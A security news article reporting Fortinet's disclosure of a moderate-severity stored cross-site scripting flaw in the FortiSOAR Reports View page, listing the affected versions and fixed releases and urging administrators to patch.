Fortinet Warns of Stored XSS Vulnerability in FortiSOAR
Fortinet disclosed a stored cross-site scripting vulnerability in FortiSOAR that allows authenticated remote attackers to execute malicious scripts via crafted HTTP requests.
Fortinet has disclosed a stored cross-site scripting (XSS) vulnerability in its FortiSOAR security orchestration, automation, and response (SOAR) platform. Tracked as CWE-79 and assigned advisory FG-IR-26-117, the flaw allows an authenticated remote attacker to inject malicious scripts into the Reports View page via crafted HTTP requests. The vulnerability carries a CVSSv3 score of 4.4, indicating a moderate severity level.
The vulnerability affects both FortiSOAR PaaS and on-premise deployments across multiple versions. For FortiSOAR PaaS, versions 7.6.0 through 7.6.3, 7.5.0 through 7.5.2, and all versions of 7.4 and 7.3 are impacted. Similarly, on-premise installations running 7.6.0 through 7.6.3, 7.5.0 through 7.5.2, and all versions of 7.4 and 7.3 are vulnerable. Fortinet has released fixes for the supported branches: upgrade to FortiSOAR PaaS 7.6.4 or above, or 7.5.3 or above. For versions 7.4 and 7.3, which are no longer under standard support, users are advised to migrate to a fixed release.
The vulnerability was internally discovered and reported by Shripal Rawal of the Fortinet PSIRT team. Stored XSS flaws are particularly dangerous because the injected script is permanently stored on the target server, meaning it can be executed every time a user accesses the affected page. In the context of a SOAR platform like FortiSOAR, which centralizes security operations and often holds sensitive playbooks, credentials, and incident data, an XSS attack could lead to data theft, session hijacking, or further lateral movement within the environment.
Fortinet's advisory notes that the vulnerability requires authentication, which reduces its severity but does not eliminate the risk. An attacker who has already gained low-level access to the system could use this flaw to escalate privileges or exfiltrate data from other authenticated sessions. The CVSSv3 score of 4.4 reflects the need for authenticated access, but the impact on confidentiality and integrity is rated as partial.
This disclosure comes amid a broader trend of vulnerabilities being discovered in SOAR and other security management platforms. As organizations increasingly rely on automation to handle security incidents, the attack surface of these platforms grows. Fortinet's PSIRT team has a history of responsibly disclosing internally found flaws, and this advisory is part of their ongoing commitment to product security.
Fortinet has not reported any active exploitation of this vulnerability in the wild. However, given the widespread deployment of FortiSOAR in enterprise environments, administrators are strongly encouraged to apply the available patches or migrate to supported versions as soon as possible. The advisory was published on April 14, 2026, with no workarounds provided beyond upgrading.
For organizations running end-of-life versions (7.4 and 7.3), the migration to a fixed release is critical, as these versions will not receive further security updates. Fortinet's advisory serves as a reminder that maintaining software currency is essential for reducing exposure to known vulnerabilities, even those that require prior authentication to exploit.